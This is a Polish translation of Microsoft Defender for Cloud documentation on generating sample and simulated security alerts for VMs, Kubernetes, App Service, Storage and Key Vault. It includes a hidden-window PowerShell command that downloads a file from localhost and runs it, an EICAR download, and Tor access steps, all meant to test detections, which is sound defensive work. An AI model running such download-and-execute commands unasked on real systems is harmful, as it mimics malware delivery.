Weryfikowanie alertów w Microsoft Defender dla Chmury

W tym artykule wyjaśniono, jak sprawdzić, czy system jest skonfigurowany pod kątem alertów Microsoft Defender dla Chmury, dzięki czemu można monitorować zagrożenia i reagować na nie.

Czym są alerty zabezpieczeń?

Alerty to powiadomienia, które Defender dla Chmury generują, gdy wykrywa zagrożenia dla zasobów. Defender dla Chmury klasyfikuje alerty według poziomu intensywności i zawiera je na liście z kluczowymi szczegółami. Możesz wykorzystać te informacje, aby szybko zbadać każdy problem. Defender dla Chmury oferuje również kroki, które pomogą Ci naprawić atak.

Aby uzyskać więcej informacji, zobacz Alerty zabezpieczeń w Defender dla Chmury i Zarządzanie alertami zabezpieczeń i reagowanie na nie.

Wymagania wstępne

Aby otrzymywać wszystkie alerty, maszyny i połączone obszary robocze usługi Log Analytics muszą znajdować się w tej samej dzierżawie.

Generowanie przykładowych alertów zabezpieczeń

Jeśli korzystasz z nowego doświadczenia z alertami podglądowymi, możesz tworzyć przykładowe alerty ze strony alertów bezpieczeństwa w portalu Azure. Więcej szczegółów znajdziesz w sekcji Zarządzaj i reaguj na alerty bezpieczeństwa w Microsoft Defender dla Chmury.

Tworzenie przykładowych alertów

Użyj przykładowych alertów, aby:

  • Oceń wartość i możliwości planów usługi Microsoft Defender.
  • Zweryfikuj wszelkie konfiguracje wprowadzone dla alertów zabezpieczeń, takich jak integracje z informacjami o zabezpieczeniach i zarządzanie zdarzeniami (SIEM), automatyzacja przepływu pracy i powiadomienia e-mail.

Aby utworzyć przykładowe alerty:

  1. Jako użytkownik z rolą Współautor subskrypcji na pasku narzędzi na stronie alertów zabezpieczeń wybierz pozycję Przykładowe alerty.
  2. Wybierz subskrypcję.
  3. Wybierz odpowiednie plany usługi Microsoft Defender, dla których chcesz wyświetlić alerty.
  4. Wybierz pozycję Utwórz przykładowe alerty.

Zrzut ekranu przedstawiający kroki tworzenia przykładowych alertów w Microsoft Defender dla Chmury.

Zostanie wyświetlone powiadomienie informujące o utworzeniu przykładowych alertów:

Zrzut ekranu przedstawiający powiadomienie o wygenerowaniu przykładowych alertów.

Po kilku minutach przykładowe alerty pojawiają się na stronie alertów bezpieczeństwa. Przykładowe alerty pojawiają się także wszędzie indziej, gdzie ustawiłeś tak, aby otrzymywać alerty bezpieczeństwa Microsoft Defender dla Chmury (połączone SIEM, powiadomienia e-mail i tak dalej).

Zrzut ekranu przedstawiający przykładowe alerty na liście alertów zabezpieczeń.

Tip

Alerty dotyczą symulowanych zasobów.

Symulowanie alertów dotyczących maszyn wirtualnych Azure (Windows)

Przed rozpoczęciem upewnij się, że:

Na komputerze, który chcesz przetestować, otwórz podniesiony wiersz poleceń i uruchom skrypt:

  1. Przejdź do pozycji Start i wpisz cmd.

  2. Kliknij prawym przyciskiem myszy pozycję Wiersz polecenia, a następnie wybierz Uruchom jako administrator.

    Zrzut ekranu przedstawiający, gdzie wybrać pozycję Uruchom jako administrator.

  3. W wierszu polecenia skopiuj i uruchom następujące polecenie: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.

  4. Okno wiersza polecenia zostanie zamknięte automatycznie. Jeśli operacja zakończy się powodzeniem, nowy alert powinien pojawić się w bloku Alerty usługi Defender dla Chmury w ciągu 10 minut.

  5. Wiersz komunikatu w oknie programu PowerShell powinien wyglądać podobnie jak pokazano tutaj:

    Zrzut ekranu przedstawiający wiersz komunikatu programu PowerShell.

Alternatywnie możesz użyć ciągu testowego EICAR, aby zasymulować alert na Windows. Utwórz plik tekstowy, wklej wiersz EICAR i zapisz plik jako plik wykonywalny na dysku lokalnym komputera.

Symulowanie alertów dotyczących maszyn wirtualnych Azure (Linux)

Przed rozpoczęciem upewnij się, że:

Na maszynie, na której chcesz symulować zaatakowany zasób, postępuj zgodnie z następującymi krokami:

  1. Otwórz okno terminalu, skopiuj i uruchom następujące polecenie: curl -O https://secure.eicar.org/eicar.com.txt
  2. Okno Terminala zamyka się automatycznie. Jeśli się powiedzie, nowy alert powinien pojawić się w blade Defender dla Chmury Alerts w ciągu 10 minut.

Symulowanie alertów na platformie Kubernetes

Defender for Containers tworzy alerty dla klastrów i węzłów klastrowych. Monitoruje zarówno płaszczyznę sterowania (serwer API), jak i obciążenie kontenera.

Aby symulować alerty dla płaszczyzny kontroli Defender for Containers oraz obciążenia kontenerowego, użyj narzędzia symulacyjnego alertów Kubernetes.

Aby dowiedzieć się więcej, zobacz Microsoft Defender for Containers.

Symulowanie alertów dla usługi App Service

Alerty dotyczące zasobów uruchomionych w usłudze App Service można symulować.

  1. Utwórz nową witrynę internetową i poczekaj 24 godziny na zarejestrowanie się w Defender dla Chmury lub użyj istniejącej witryny internetowej.
  2. Po utworzeniu witryny internetowej uzyskaj do niej dostęp przy użyciu następującego adresu URL:
    1. Otwórz okienko zasobów usługi App Service i skopiuj domenę adresu URL z domyślnego pola domeny.

      Zrzut ekranu przedstawiający miejsce kopiowania domeny domyślnej.

    2. Skopiuj nazwę witryny internetowej do adresu URL: https://<website-name>.azurewebsites.net/This_Will_Generate_ASC_Alert.

  3. Alert jest generowany w ciągu około 2 do 4 godzin.

Symuluj alerty dla Storage Advanced Threat Protection (ATP)

Aby zweryfikować wykrywanie zagrożeń dla Microsoft Defender dla usługi Storage, wykonaj następujące kroki:

  1. Przejdź do konta magazynu, na którym włączono usługę Azure Defender for Storage.

  2. Wybierz kartę Kontenery na pasku bocznym.

    Zrzut ekranu przedstawiający, gdzie przejść do wybrania kontenera.

  3. Przejdź do istniejącego kontenera lub utwórz nowy.

  4. Przekaż plik do tego kontenera. Unikaj przekazywania dowolnego pliku, który może zawierać poufne dane.

    Zrzut ekranu przedstawiający miejsce przekazania pliku do kontenera.

  5. Kliknij prawym przyciskiem myszy przesłany plik i wybierz polecenie Generuj SAS.

  6. Wybierz przycisk Generuj token SAS i adres URL (nie trzeba zmieniać żadnych opcji).

  7. Skopiuj wygenerowany adres URL SAS.

  8. Otwórz stronę pobierania przeglądarki Tor i zainstaluj przeglądarkę Tor.

  9. W przeglądarce Tor Browser przejdź do adresu URL SAS. Powinieneś teraz widzieć i móc pobrać plik, który został przesłany.

Symulacja alertów dla App Service (EICAR)

Aby zasymulować alert EICAR dla usług aplikacji:

  1. Znajdź punkt końcowy HTTP witryny, otwierając w portalu Azure panel witryny usługi App Service lub korzystając z niestandardowego wpisu DNS skojarzonego z tą witryną. (Domyślny punkt końcowy adresu URL witryny internetowej usługi aplikacja systemu Azure Service ma sufiks https://XXXXXXX.azurewebsites.net). Witryna internetowa powinna być istniejącą witryną internetową, a nie witryną, która została utworzona przed symulacją alertu.
  2. Znajdź punkt końcowy HTTP witryny internetowej, przechodząc do panelu witryny App Services w Portalu Azure lub korzystając z niestandardowego wpisu DNS skojarzonego z tą witryną internetową. (Domyślny punkt końcowy adresu URL witryny internetowej usługi aplikacja systemu Azure Service ma sufiks https://XXXXXXX.azurewebsites.net). Witryna internetowa powinna być istniejącą witryną internetową, a nie witryną, która została utworzona przed symulacją alertu.
  3. Przejdź do adresu URL witryny internetowej i dodaj następujący stały sufiks: /This_Will_Generate_ASC_Alert. Adres URL powinien wyglądać następująco: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Wygenerowanie alertu może zająć trochę czasu (ok. 1,5 godziny).

Weryfikowanie wykrywania zagrożeń w usłudze Azure Key Vault

Aby zweryfikować wykrywanie zagrożeń Azure Key Vault, stwórz sejf kluczy korzystając z portalu Azure, a następnie wykonaj następujące kroki:

Wymagania wstępne

Kroki weryfikacji

Aby zweryfikować wykrywanie zagrożeń Azure Key Vault:

  1. Po utworzeniu usługi Key Vault i sekretu przejdź na maszynę wirtualną, która ma dostęp do Internetu, i pobierz przeglądarkę TOR Browser.
  2. Zainstaluj przeglądarkę TOR na maszynie wirtualnej.
  3. Po zakończeniu instalacji otwórz zwykłą przeglądarkę, zaloguj się do witryny Azure Portal i uzyskaj dostęp do strony usługi Key Vault. Wybierz wyróżniony adres URL i skopiuj adres.
  4. Otwórz tor i wklej ten adres URL (musisz ponownie uwierzytelnić się, aby uzyskać dostęp do witryny Azure Portal).
  5. Po dokonaniu dostępu możesz również wybrać opcję Wpisy tajne w okienku po lewej stronie.
  6. W przeglądarce TOR wyloguj się z witryny Azure Portal i zamknij przeglądarkę.
  7. Po pewnym czasie usługa Defender for Key Vault wyzwala alert ze szczegółowymi informacjami na temat tego podejrzanego działania.

Dowiedz się więcej o alertach i wykrywaniu zagrożeń w Defender dla Chmury: